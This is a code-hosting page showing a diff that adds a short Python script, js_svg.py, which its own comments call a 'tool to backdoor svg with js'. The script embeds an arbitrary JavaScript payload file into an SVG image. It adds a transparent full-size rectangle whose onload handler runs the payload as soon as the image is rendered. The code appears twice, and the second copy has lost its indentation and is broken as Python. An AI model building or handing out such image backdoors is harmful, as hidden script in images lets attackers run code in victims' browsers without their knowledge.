majestrate · April 18, 2017 02:58
diff --git a/js_svg.py b/js_svg.py
 #!/usr/bin/env python3
 #
 # tool to backdoor svg with js
 #
 # usage: ./js_svg.py input.svg payload.js > output.svg
 #

 from bs4 import BeautifulSoup as BS
 from bs4 import CData

 def putJsFile(soup, js_fname):
    with open(js_fname) as f:
        js_data = "function run(evt) {\n" + f.read() + "\n}\n"
    # add script
    script = soup.new_tag('script', type="text/javascript")
    script.string = CData(js_data)
    svg = soup.svg
    svg.append(script)
    h = svg.get("height")
    w = svg.get("width")
    # add element to call js
    text = soup.new_tag('rect', opacity=0.0, x=0, y=0, height=h, width=w, onload="run(evt)")
    svg.append(text)

 def main():
    import sys
    args = sys.argv[1:]
    assert len(args) == 2
    with open(args[0]) as f:
        soup = BS(f.read())
    putJsFile(soup, args[1])
    print (soup.prettify())


 if __name__ == '__main__':
    main()
	#!/usr/bin/env python3
	#
	# tool to backdoor svg with js
	#
	# usage: ./js_svg.py input.svg payload.js > output.svg
	#

	from bs4 import BeautifulSoup as BS
	from bs4 import CData

	def putJsFile(soup, js_fname):
	with open(js_fname) as f:
	js_data = "function run(evt) {\n" + f.read() + "\n}\n"
	# add script
	script = soup.new_tag('script', type="text/javascript")
	script.string = CData(js_data)
	svg = soup.svg
	svg.append(script)
	h = svg.get("height")
	w = svg.get("width")
	# add element to call js
	text = soup.new_tag('rect', opacity=0.0, x=0, y=0, height=h, width=w, onload="run(evt)")
	svg.append(text)

	def main():
	import sys
	args = sys.argv[1:]
	assert len(args) == 2
	with open(args[0]) as f:
	soup = BS(f.read())
	putJsFile(soup, args[1])
	print (soup.prettify())


	if __name__ == '__main__':
	main()